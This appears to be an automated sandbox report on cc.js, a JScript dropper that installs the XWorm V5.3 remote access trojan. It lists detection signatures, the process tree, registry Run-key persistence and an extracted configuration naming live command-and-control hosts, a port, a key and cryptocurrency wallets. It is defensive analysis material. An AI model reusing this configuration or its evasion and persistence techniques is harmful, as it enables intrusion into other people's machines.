Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cc.js

Overview

General Information

Sample name:cc.js
Analysis ID:1523189
MD5:c63888086e1646654a1e162fde69c0ff
SHA1:8580dafbffe4d9b0d7e122127a455682ad2bd30e
SHA256:262fb2e45f9b66956236f89f4cbeac22ee3d011832263a28ed7f632a22ae87d7
Tags:192-210-215-11jsuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to disable the Task Manager (.Net Source)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1776 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • GeUT.exe (PID: 3784 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
      • GeUT.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • GeUT.exe (PID: 3516 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 4948 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5916 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 4976 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 716 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • Service.exe (PID: 7072 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4080 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 6696 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1088 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 2444 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • GeUT.exe (PID: 1320 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 2404 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 3172 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5004 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • Service.exe (PID: 2940 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1776 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4800 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 6976 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 5144 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • cleanup
{"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x97ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9889:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x999e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8ff0:$cnc4: POST / HTTP/1.1
    00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x2e488:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x396cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x44928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x50090:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x78ee8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8412c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8f388:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x9aaf0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xc3948:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xceb8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xd9de8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xe5550:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10e3b4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1195f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x124854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x12ffbc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x2e525:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x39769:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x449c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x5012d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x78f85:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        5.2.GeUT.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          5.2.GeUT.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x99ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x9a89:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9b9e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x91f0:$cnc4: POST / HTTP/1.1
          2.2.GeUT.exe.28363bc.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            2.2.GeUT.exe.28363bc.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x109e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x1bc28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x26e84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x327f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x10a81:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x1bcc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x26f21:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x32891:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x10b96:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x1bdda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x27036:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x329a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x101e8:$cnc4: POST / HTTP/1.1
            • 0x1b42c:$cnc4: POST / HTTP/1.1
            • 0x26688:$cnc4: POST / HTTP/1.1
            • 0x31ff8:$cnc4: POST / HTTP/1.1
            2.2.GeUT.exe.2838018.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 15 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", ProcessId: 1776, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", ProcessId: 1776, ProcessName: wscript.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: cc.jsAvira: detected
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Source: C:\Users\user\AppData\Roaming\Service.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
              Source: cc.jsReversingLabs: Detection: 39%
              Source: cc.jsVirustotal: Detection: 31%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\Service.exeJoe Sandbox ML: detected
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: as525795.duckdns.org,194.37.97.150
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: 6980
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: <123456789>
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: <Xwormmm>
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: XWorm V5.3
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: adobe.exe
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
              Source: 5.2.GeUT.exe.400000.0.unpackString decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN
              Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Malware configuration extractorURLs: as525795.duckdns.org
              Source: Malware configuration extractorURLs: 194.37.97.150
              Source: unknownDNS query: name: as525795.duckdns.org
              Source: unknownDNS traffic detected: query: as525795.duckdns.org replaycode: Server failure (2)
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: as525795.duckdns.org
              Source: GeUT.exe, 00000008.00000002.2286549047.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
              Source: GeUT.exe, 00000003.00000002.3410104953.00000000025D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 2_2_00C90D302_2_00C90D30
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_00AE2B363_2_00AE2B36
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_00AE13B83_2_00AE13B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_00AE3B2E3_2_00AE3B2E
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA947C3_2_04EA947C
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA6CA83_2_04EA6CA8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA88783_2_04EA8878
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA5B183_2_04EA5B18
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EAC5D03_2_04EAC5D0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA33C43_2_04EA33C4
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA9D103_2_04EA9D10
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA4EA03_2_04EA4EA0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 3_2_04EA4E903_2_04EA4E90
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_018743D04_2_018743D0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_018772884_2_01877288
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_018752084_2_01875208
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_01870D324_2_01870D32
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_018764504_2_01876450
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_0187727C4_2_0187727C
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 4_2_0187644A4_2_0187644A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_02E113B85_2_02E113B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 6_2_011B13B86_2_011B13B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 7_2_00FA13B87_2_00FA13B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 8_2_008813B88_2_008813B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 9_2_029113B89_2_029113B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 11_2_00B3728811_2_00B37288
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 11_2_00B3520811_2_00B35208
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 11_2_00B343D011_2_00B343D0
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 11_2_00B3645011_2_00B36450
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 11_2_00B30D3311_2_00B30D33
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 11_2_00B3727C11_2_00B3727C
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 13_2_00E113B813_2_00E113B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 14_2_00C113B814_2_00C113B8
